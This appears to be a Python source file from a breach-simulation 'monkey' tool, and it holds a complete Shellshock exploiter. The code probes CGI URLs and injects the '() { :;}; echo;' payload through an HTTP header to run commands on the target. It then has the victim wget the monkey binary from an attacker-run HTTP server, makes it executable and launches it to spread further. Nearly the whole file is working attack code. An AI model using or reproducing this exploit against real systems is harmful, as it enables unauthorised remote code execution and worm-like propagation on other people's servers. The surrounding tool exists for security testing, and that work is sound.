# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py import logging from random import choice import string from tools import build_monkey_commandline from exploit import HostExploiter from model.host import VictimHost from shellshock_resources import CGI_FILES from model import MONKEY_ARG from exploit.tools import get_target_monkey, HTTPTools import requests __author__ = 'danielg' LOG = logging.getLogger(__name__) TIMEOUT = 2 TEST_COMMAND = '/bin/uname -a' DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder class ShellShockExploiter(HostExploiter): _target_os_type = ['linux'] _attacks = { "Content-type": "() { :;}; echo; " } def __init__(self): self._config = __import__('config').WormConfiguration self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.success_flag = ''.join( choice(string.ascii_uppercase + string.digits ) for _ in range(20)) self.skip_exist = self._config.skip_exploit_if_file_exist def exploit_host(self, host, depth=-1, src_path=None): assert isinstance(host, VictimHost) # start by picking ports candidate_services = {service: host.services[service] for service in host.services if host.services[service]['name'] == 'http'} valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if 'tcp-' + str(port) in candidate_services] http_ports = [port[0] for port in valid_ports if not port[1]] https_ports = [port[0] for port in valid_ports if port[1]] LOG.info( 'Scanning %s, ports [%s] for vulnerable CGI pages' % ( host, ",".join([str(port[0]) for port in valid_ports])) ) attackable_urls = [] # now for each port we want to check the entire URL list for port in http_ports: urls = self.check_urls(host.ip_addr, port) attackable_urls.extend(urls) for port in https_ports: urls = self.check_urls(host.ip_addr, port, is_https=True) attackable_urls.extend(urls) # now for each URl we want to try and see if it's attackable exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls] exploitable_urls = [url for url in exploitable_urls if url[0] is True] # we want to report all vulnerable URLs even if we didn't succeed # let's overload this # TODO: uncomment when server is ready for it # [self.report_vuln_shellshock(host, url) for url in exploitable_urls] # now try URLs until we install something on victim for _, url, header, exploit in exploitable_urls: LOG.info("Trying to attack host %s with %s URL" % (host, url)) # same attack script as sshexec # for any failure, quit and don't try other URLs if not host.os.get('type'): try: uname_os_attack = exploit + '/bin/uname -o' uname_os = self.attack_page(url, header, uname_os_attack) if 'linux' in uname_os: host.os['type'] = 'linux' else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False except Exception, exc: LOG.debug("Error running uname os commad on victim %r: (%s)", host, exc) return False if not host.os.get('machine'): try: uname_machine_attack = exploit + '/bin/uname -m' uname_machine = self.attack_page(url, header, uname_machine_attack) if '' != uname_machine: host.os['machine'] = uname_machine.lower().strip() except Exception, exc: LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc) return False # copy the monkey dropper_target_path_linux = self._config.dropper_target_path_linux if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.info("Host %s was already infected under the current configuration, done" % host) return True # return already infected src_path = src_path or get_target_monkey(host) if not src_path: LOG.info("Can't find suitable monkey executable for host %r", host) return False http_path, http_thread = HTTPTools.create_transfer(host, src_path) if not http_path: LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") return False download_command = '/usr/bin/wget %s -O %s;' % ( http_path, dropper_target_path_linux) download = exploit + download_command self.attack_page(url, header, download) # we ignore failures here since it might take more than TIMEOUT time http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() if (http_thread.downloads != 1) or ( 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue # turn the monkey into an executable chmod = '/bin/chmod +x %s' % dropper_target_path_linux run_path = exploit + chmod self.attack_page(url, header, run_path) # run the monkey cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline(host, depth - 1) + ' & ' run_path = exploit + cmdline self.attack_page(url, header, run_path) LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, host, cmdline) if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)): LOG.info("Log file does not exist, monkey might not have run") continue return True @classmethod def check_remote_file_exists(cls, url, header, exploit, file_path): """ Checks if a remote file exists and returns the content if so file_path should be fully qualified """ cmdline = '/usr/bin/head -c 4 %s' % file_path run_path = exploit + cmdline resp = cls.attack_page(url, header, run_path) if resp: LOG.info("File %s exists on remote host" % file_path) return resp def attempt_exploit(self, url, attacks=_attacks): # Flag used to identify whether the exploit has successfully caused the # server to return a useful response LOG.debug("Attack Flag is: %s" % self.success_flag) LOG.debug("Trying exploit for %s" % url) for header, exploit in attacks.iteritems(): attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND result = self.attack_page(url, header, attack) if self.success_flag in result: LOG.info("URL %s looks vulnerable" % url) return True, url, header, exploit else: LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) return False, @staticmethod def attack_page(url, header, attack): result = "" try: LOG.debug("Header is: %s" % header) LOG.debug("Attack is: %s" % attack) r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) result = r.content return result except requests.exceptions.RequestException as exc: LOG.debug("Failed to run, exception %s" % exc) return result @staticmethod def check_urls(host, port, is_https=False, url_list=CGI_FILES): """ Checks if which urls exist :return: Sequence of URLs to try and attack """ import requests attack_path = 'http://' if is_https: attack_path = 'https://' attack_path = attack_path + str(host) + ":" + str(port) attack_urls = [attack_path + url for url in url_list] reqs = [requests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls] valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] urls = [resp.url for resp in valid_resps] return urls @staticmethod def report_vuln_shellshock(host, url): from control import ControlClient ControlClient.send_telemetry('exploit', {'vulnerable': True, 'machine': host.__dict__, 'exploiter': ShellShockExploiter.__name__, 'url': url})